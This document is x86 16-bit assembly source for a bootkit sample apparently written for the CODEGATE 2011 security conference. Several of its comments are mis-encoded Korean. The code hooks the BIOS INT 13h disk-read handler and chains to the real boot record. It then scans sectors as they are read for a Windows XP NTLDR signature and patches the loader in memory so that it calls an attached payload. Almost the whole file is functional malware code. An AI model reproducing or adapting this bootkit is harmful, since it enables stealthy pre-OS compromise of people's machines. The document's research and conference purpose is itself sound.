;==============================================================================
; bootkit sample for for CODEGATE 2011 
;
;==============================================================================
; Author    somma (somma@fsksec.co.kr)
;           http://somma.egloos.com
;==============================================================================
; All rights reserved by FSK Security Co.Ltd.
;==============================================================================
BITS	16

; generate a map file
;
[map symbols bootloader.map]

; bootsector.asm  jmp magic_room:0000 ȣ  Ѿ 
; cs = magic_room 
;
jmp bootloader_start

; disk image layout
; 0                    +512                  +512                  +512
; +---------------------+---------------------+---------------------+
; |    bootsector.bin   |   bootloader.bin    |  ntpayload.bin      |
; +---------------------+---------------------+---------------------+
;
;
; memory layout    
;
; 0x07c0:0000                  0xfree_space         +512                    +512
; +---------------------+        +---------------------+---------------------+
; | bootsector.bin      |  ~~~   | bootloader.bin      | ntpayload.bin       |
; +---------------------+        +---------------------+---------------------+
;

CODE32START_LINEAR_ADDRESS	dd	0x00000000		; CODE32START address

;==============================================================================
; data                         
;==============================================================================
	msg_bootloader	db '[FSK] loading bootloader .................... OK',0xd,0	
	msg_osloader	db '[FSK] loading os loader ..................... OK',0xd,0
    msg_os_boot	    db '[FSK] press any key to continue .............',0xd,0
    msg_int_msg     db '....',0xd,0
    

;==============================================================================
; functions
;==============================================================================


;--------------------------------------------------------------------------
; Dump ds:si to screen.
;--------------------------------------------------------------------------
message:
	pusha
	pushf
	
	.printchar:	
		lodsb                   ; load byte at ds:si into al
		or al,al                ; test if character is 0 (end)
		jz .done
		mov ah,0eh              ; put character
		mov bx,0007             ; attribute
		int 0x10                ; call BIOS
		jmp .printchar
	.done:
		popf
		popa
		ret

;--------------------------------------------------------------------------
; clears the screen by switching to mode 3
; ->it also reset the writing cursor position
;--------------------------------------------------------------------------
clear_screen:
	push ax
	mov ax, 0x0003
	int 0x10	
	pop ax
	ret



;--------------------------------------------------------------------------
;
;--------------------------------------------------------------------------
bootloader_start:	
    ; ׸Ʈ 
    ;
	xor		eax, eax    
	mov     ax, cs
    mov     es, ax

	; NTLDR_PATCH_PTR -> CODE32START  linear ּ 
	;	ntpayload  ޸𸮻 ι° ͷ εǹǷ cs:0200h  
	;
	shl		eax, 4
	add		eax, 0x0200
	mov		[cs:CODE32START_LINEAR_ADDRESS], eax

	
	; make stack
	;
	xor     bx, bx
    mov     ss, bx
    mov     [ss:7BFEh], sp
    mov     sp, 7BFEh
    
    
    ; Interrupt Vector
    ;
    ; 0000h:0000h ~ 0000h:03FCh (0xff * 4 = 0x3fc)
    ; 
    ; 0h          2h           4h           6h           8h
    ; +------------+------------+------------+------------+
    ; |    offset  |  segment   |    offset  |  segment   |
    ; +------------+------------+------------+------------+
    ;          INT 00           |        INT 02
    ;
    xor     bx, bx
    mov     ds, bx

	; svae original INT 13h handler ( our int 13 handler -> 9EC0h:0128h )
	;
    mov     eax, [bx + (0x13 * 0x04)]
    mov     [es:OriginalInt13Handler + 0x01], eax

    ; hook INT 13h
    ; 
    mov     word [bx + (0x13 * 0x04)], INT13_HANDLER			; set IVT offset
    mov     [bx + ((0x13 * 0x04) + 0x02)], es					; segment

    mov     ax, es
    mov     ds, ax

    
    call	clear_screen
    
	mov		si, msg_os_boot
	call	message
	
	mov     ah, 0               ; wait for key
	int     0x016

	load_os_mbr:
        mov		ax, 0x07c0				;BOOT_SEG
		mov		es, ax
		xor		bx, bx					; dest = 0x7c00:0000	
		mov		ax, 0x0201

		mov		cx, 0001
		mov		dx, 0080h
		int		13h
		jc		load_os_mbr

		jmp		0x07c0:0x0000
        
        hlt            
        ;  hdd  ġ mbr  εǾ  OS   

         
;==============================================================================
; int 13h  ڵ鷯
;==============================================================================
; DISK - READ SECTOR(S) INTO MEMORY (http://www.ctyme.com/intr/rb-0607.htm)
;	AH = 02h
;	AL = number of sectors to read (must be nonzero)
;	CH = low eight bits of cylinder number
;	CL = sector number 1-63 (bits 0-5)
;		 high two bits of cylinder (bits 6-7, hard disk only)
;	DH = head number
;	DL = drive number (bit 7 set for hard disk)
;	ES:BX -> data buffer;
; Return:
;	CF set on error
;	if AH = 11h (corrected ECC error), AL = burst length
;	CF clear if successful
;	AH = status (see #00234)
;	AL = number of sectors transferred (only valid if CF set for some BIOSes)
;
;
; IBM/MS INT 13 Extensions - EXTENDED READ  (http://www.ctyme.com/intr/rb-0708.htm)
;	AH = 42h
;	DL = drive number
;	DS:SI -> disk address packet (see #00272)
; Return:
;	CF clear if successful
;	AH = 00h
;
;	CF set on error
;	AH = error code (see #00234)
;	     disk address packet's block count field set to number of blocks successfully transferred
;	
;	See Also: AH=02h - AH=41h"INT 13 Ext" - AH=43h"INT 13 Ext"
;
; Format of disk address packet:
;	Offset  Size    Description     (Table 00272)
;	00h    BYTE    size of packet (10h or 18h)
;	01h    BYTE    reserved (0)
;	02h    WORD    number of blocks to transfer (max 007Fh for Phoenix EDD)
;	04h    DWORD   -> transfer buffer
;	08h    QWORD   starting absolute block number
;				   (for non-LBA devices, compute as (Cylinder*NumHeads + SelectedHead) * SectorPerTrack + SelectedSector - 1)
;	10h    QWORD   (EDD-3.0, optional) 64-bit flat address of transfer buffer used if DWORD at 04h is FFFFh:FFFFh
;==============================================================================
INT13_HANDLER:
	; cs = 0x9EC0, DS=0x9EC0, ES: 0x07C0, FS=0x0000, GS=0x0000, SS=0x0000, ESP=0x7BF8
	; by debugging result
	;
	pushf

	cmp		ah, 0x42					; extended read 
	je		Int13_read_handler
	cmp		ah, 0x02					; read
	je		Int13_read_handler

	popf

    OriginalInt13Handler:
    ; ea xxxxyyyy   jmp far ptr yyyy:xxxx
    db      0xea
    dd      0x00000000
    


;==============================================================================
; INT13 disk read request handler
;	IVT  ġҶ segment:offset · ǹǷ cs  ׻ bootkit ּ!!
;==============================================================================
Int13_read_handler:
	mov		[cs:Int13_read_function_number + 1], ah		; function number  
	
	; bios:9EC64 2E 88 26 79 00          mov     cs:byte_79, ah
	; bios:9EC69 9D                      popf
	; bios:9EC6A 9C                      pushf
	; bios:9EC6B 2E FF 16 60 00          call    cs:word_60        (X)
	; bios:9EC6B 2E FF 1E 60 00          call    cs:dword_60       (O)
	popf
	pushf												; flag  ϰ Ƿ ÷ 
	call	far [cs:OriginalInt13Handler + 1]			; original "int 13h" ڵ鷯 ȣ
	jc		short Int13_read_handler_exit
	
	pushf
	cli
	push	es	
	pusha
	

	; load int 13h parameters 
	; ah=42h   (extended read) ah=02h ó Ķ͵  
	;
	mov		ah, 00h

	Int13_read_function_number:
		mov		ch, 0
		cmp		ch, 42h
		jnz		Int13_parameter_normalized

		; int 13 extended read request
		;	- disk address packet κ  оδ.
		;
		lodsw										; +02h = [word] number of blocks to transfer 
		lodsw										; +04h = transfer buffer	
		les		bx, [si]

	Int13_parameter_normalized:
		test	ax, ax							; ax = number of sectors transfered
		jle		Int13_read_handler_restore_exit
		cld
		mov		cx, ax
		shl		cx, 0x9							; sectors * 512
		mov		al, 0x8b						; byte to find
		mov		di, bx							; data buffer offset of sector


		.Scan_read_sector_loop:
			; now scan the read buffer for the signature of ntldr
			;    ++   8B F0 85 F6 74 21/22 80 3D
			;         ===>   Windows XP.NTLDR +26B9Fh
			;
			; seg000:26C3C                         ; ---------------------------------------------------------------------------
			; seg000:26C3C 8B F0                                   mov     si, ax
			; seg000:26C3E 85 F6                                   test    si, si
			; seg000:26C40 74 21                                   jz      short loc_6C63
			; seg000:26C42 80 3D 10                                cmp     byte ptr [di], 10h
			; seg000:26C45 AF                                      scasw
			; seg000:26C46 43                                      inc     bx
			; seg000:26C46                         ; ---------------------------------------------------------------------------
			;

			repne	scasb
			jne		short Int13_read_handler_restore_exit

			mov		eax, [es:di]
			cmp		eax, 0x74F685F0
			jnz		short .Scan_read_sector_loop

			mov		ax, [es:di + 0x04]
			cmp		ax, 0x8021
			jnz		short .Scan_read_sector_loop

			
	patch_NTLDR:
		mov		word [es:di-1], 0x15FF					; FF 15 xx xx xx xx: FF /2	CALL r/m32 -> call disp32 !! ̷ @!.. -_-;

		xor		eax, eax
		mov		ax, cs
		shl		eax, 4
		add		eax, CODE32START_LINEAR_ADDRESS
		
		mov		dword [es:di+1], eax					; call dword ptr [CODE32START_LINEAR_ADDRESS]
			
	Int13_read_handler_restore_exit:
		popa
		pop		es
		popf

	Int13_read_handler_exit:
		retf	2										; discard saved Flags from original INT (pass back CF, etc.)

		










